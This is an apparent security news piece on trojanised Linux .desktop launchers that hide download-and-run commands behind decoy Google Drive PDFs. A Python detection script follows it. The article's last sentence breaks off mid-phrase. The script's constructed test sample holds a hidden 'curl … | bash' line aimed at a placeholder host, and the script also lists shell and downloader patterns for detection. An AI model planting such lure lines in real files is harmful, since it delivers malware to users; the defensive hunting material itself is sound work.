Desktop Files Pose Trojan Threat to Linux

Google Threat Intelligence has published a set of hunting techniques aimed at identifying malicious .desktop files, which are increasingly being used in attacks. These plain-text configuration files traditionally define application launchers on Linux (the name, icon and command behind a desktop shortcut or menu entry), but they have now become a channel for delivering malicious code.

The technique was first described by Zscaler in 2023. Attackers embed commands in the Exec= key of a .desktop file and disguise the activity as the legitimate opening of a PDF document hosted on Google Drive. By invoking utilities such as xdg-open, gio open, exo-open and kde-open, the malicious .desktop file quietly launches the user's browser on the decoy document while at the same time fetching secondary payloads.

A recent increase in suspicious .desktop files submitted to Google's analysis platform prompted a closer investigation. The malicious files frequently contain thousands of "#" characters inserted between the legitimate lines to obscure the file's real purpose. Although they still conform to the Desktop Entry specification, they carry commands that launch a Bash shell and run scripts which download and execute malicious code.

Google Threat Intelligence released a detailed report on the behaviour chains observed when such files are launched. In one chain, xdg-open hands the request to exo-open, which in turn invokes exo-helper-2 and finally opens the link in Firefox; the same chain can also trigger the hidden installation of miners or other malicious ELF files. The method relies entirely on standard Linux behaviour, abusing the trust the desktop environment places in .desktop files.

To counter these threats, Google's analysts recommend specific hunting queries. For instance, searching for the argument --launch WebBrowser in combination with a Google Drive URL can surface potentially harmful activity. Other queries focus on the behavioural characteristics of processes such as xdg-open, exo-open, kde-open and related utilities, and on monitoring specific commands such as /usr/bin/green ^
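The padding trick and the decoy-plus-payload Exec= line described above translate directly into a file-level triage check. The following script is an added example, not code from Google's report or from the Zscaler write-up: it parses a .desktop file, counts comment padding, and flags an Exec= value that combines a shell invocation, one of the named opener utilities pointed at a Google Drive URL, and a remote fetch. The two input files are constructed for this example; the thresholds, finding names and the example.invalid URL are assumptions, not indicators from the report.

```python
"""Triage a .desktop file for the traits described in the report (added example)."""
import re
from dataclasses import dataclass, field

# Opener utilities named in the report; one of these next to a Google Drive URL
# is the "open a decoy PDF in the browser" pattern.
OPENERS = ("xdg-open", "gio open", "exo-open", "kde-open")
# Shell launchers and downloaders that have no business in a PDF shortcut.
SHELLS = ("bash -c", "sh -c", "/bin/bash", "/bin/sh")
FETCHERS = ("curl ", "wget ", "base64 -d", "python3 -c")
GDRIVE_RE = re.compile(r"https?://(?:drive|docs)\.google\.com/\S+")


@dataclass
class DesktopEntry:
    keys: dict = field(default_factory=dict)  # keys of the [Desktop Entry] group
    comment_lines: int = 0                    # lines starting with '#'
    total_lines: int = 0


def parse_desktop(text: str) -> DesktopEntry:
    """Minimal Desktop Entry parser: keeps only the [Desktop Entry] group."""
    entry = DesktopEntry()
    in_group = False
    for raw in text.splitlines():
        entry.total_lines += 1
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            entry.comment_lines += 1
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry.keys[key.strip()] = value.strip()
    return entry


def assess(text: str, padding_threshold: int = 100) -> list:
    """Return the list of suspicious traits found; empty for a clean launcher.

    padding_threshold is an assumed cut-off: legitimate launchers rarely carry
    more than a handful of comment lines.
    """
    entry = parse_desktop(text)
    exec_cmd = entry.keys.get("Exec", "")
    findings = []
    if entry.comment_lines >= padding_threshold:
        findings.append(f"comment_padding:{entry.comment_lines}")
    if any(s in exec_cmd for s in SHELLS):
        findings.append("shell_exec")
    if any(o in exec_cmd for o in OPENERS) and GDRIVE_RE.search(exec_cmd):
        findings.append("gdrive_decoy_open")
    if any(f in exec_cmd for f in FETCHERS):
        findings.append("remote_fetch")
    # A file that presents itself as a PDF but runs a shell is a lure.
    name, icon = entry.keys.get("Name", "").lower(), entry.keys.get("Icon", "").lower()
    if "shell_exec" in findings and (name.endswith(".pdf") or "pdf" in icon):
        findings.append("pdf_lure")
    return findings


# Constructed sample modelled on the padding-and-decoy pattern; the payload URL
# is a placeholder and nothing here is executed.
SUSPICIOUS = "\n".join(
    ["[Desktop Entry]", "Type=Application", "Name=Invoice_2024.pdf",
     "Icon=application-pdf", "Terminal=false"]
    + ["#"] * 3000
    + ['Exec=bash -c "xdg-open https://drive.google.com/file/d/EXAMPLE/view; '
       'curl -s http://payload.example.invalid/s.sh | bash"']
)

# Constructed benign launcher for comparison.
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, assess(sample) or "no findings")
```

Run it against a directory of ~/.local/share/applications/*.desktop or against files extracted from mail attachments; any hit on gdrive_decoy_open together with remote_fetch deserves the process-tree review the report describes (xdg-open to exo-open to the browser, with an unexpected sibling process).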
